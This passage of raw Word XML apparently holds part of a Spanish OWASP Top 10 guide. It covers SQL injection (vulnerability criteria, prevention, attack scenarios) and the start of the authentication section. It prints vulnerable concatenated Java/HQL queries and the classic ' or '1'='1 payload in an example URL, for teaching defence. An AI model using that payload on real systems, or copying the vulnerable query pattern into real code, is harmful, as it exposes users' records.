              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="6091" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>¿La aplicación es vulnerable?</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Una aplicación es vulnerable a ataques de este tipo cuando:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Los datos suministrados por el usuario no son validados, filtrados o sanitizados por la aplicación.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Se invocan consultas dinámicas o no parametrizadas, sin codificar los parámetros de forma acorde al contexto.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Se utilizan datos dañinos dentro de los parámetros de búsqueda en consultas Object-Relational Mapping (ORM), para extraer registros adicionales sensibles.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Los datos dañinos se usan directamente o se concatenan, de modo que el SQL o comando resultante contiene datos y estructuras con consultas dinámicas, comandos o procedimientos almacenados.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6089" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Plan de contingencia</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Para prevenir inyecciones, se requiere separar los datos de los comandos y las consultas.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">La opción preferida es utilizar una API segura, que evite el uso de un intérprete por completo y proporcione una interfaz parametrizada. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0059624A" w:rsidRPr="00912EEA" w:rsidRDefault="0059624A" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:ind w:left="720"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="0059624A" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:ind w:left="432"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidR="00912EEA" w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Nota:</w:t>
            </w:r>
            <w:r w:rsidR="00912EEA" w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Incluso cuando se parametrizan, los </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidR="00912EEA" w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">procedimientos almacenados pueden introducir una inyección SQL si el procedimiento PL/SQL o T-SQL concatena consultas y datos, o se ejecutan parámetros utilizando EXECUTE IMMEDIATE o exec (). </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Realice validaciones de entradas de datos en el servidor, utilizando "listas blancas". De todos modos, esto no es una defensa completa ya que muchas aplicaciones requieren el uso de caracteres especiales, como en campos de texto, APIs o aplicaciones móviles. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Para cualquier consulta dinámica residual, escape caracteres especiales utilizando la sintaxis de caracteres específica para el intérprete que se trate. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="0059624A" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:ind w:left="432"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidR="00912EEA" w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Nota:</w:t>
            </w:r>
            <w:r w:rsidR="00912EEA" w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> La estructura de SQL como nombres de tabla, nombres de columna, etc. no se pueden escapar y, por lo tanto, los nombres de estructura suministrados por el usuario son peligrosos. Este es un problema común en el software de redacción de informes. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Utilice LIMIT y otros controles SQL dentro de las consultas para evitar la fuga masiva de registros en caso de inyección SQL.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F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0" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Ejemplos de escenarios de ataque</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Escenario #1: </w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>La aplicación utiliza datos no confiables en la construcción del siguiente comando SQL vulnerable:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>String query = "SELECT * FROM accounts WHERE custID='"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>+ request.getParameter("id") + "'";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Escenario #2: </w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>La confianza total de una aplicación en su framework puede resultar en consultas que aún son vulnerables a inyección, por ejemplo Hibernate Query Language (HQL):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Query HQLQuery = session.createQuery("FROM accounts WHERE custID='"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>+ request.getParameter("id") + "'");</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Escenario #3: </w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">En ambos casos, el atacante puede modificar el parámetro “id” en su navegador para enviar: </w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>‘or ‘1’=1</w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>. Por ejemplo:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>http://example.com/app/accountView?id=' or '1'='1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Esto cambia el significado de ambas consultas, devolviendo todos los registros de la tabla “accounts”. Ataques más peligrosos podrían modificar los datos o incluso invocar procedimientos almacenados.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="12180" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251688960" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="601EBC51" wp14:editId="162B5BED">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>-65083</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>0</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1314633" cy="847843"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>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5418D9.tmp"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId76">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1314633" cy="847843"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                  <wp14:sizeRelH relativeFrom="page">
                    <wp14:pctWidth>0</wp14:pctWidth>
                  </wp14:sizeRelH>
                  <wp14:sizeRelV relativeFrom="page">
                    <wp14:pctHeight>0</wp14:pctHeight>
                  </wp14:sizeRelV>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Pérdida de Autenticación</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F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0" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00857687">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Las funciones de la aplicación relacionadas a autenticación y gestión de sesiones son implementadas incorrectamente, permitiendo a los atacantes comprometer usuarios y contraseñas, token de sesiones, o explorar otras fallas de implementación para asumir la identidad de otros usuarios (temporal o permanentemente).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="12180" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
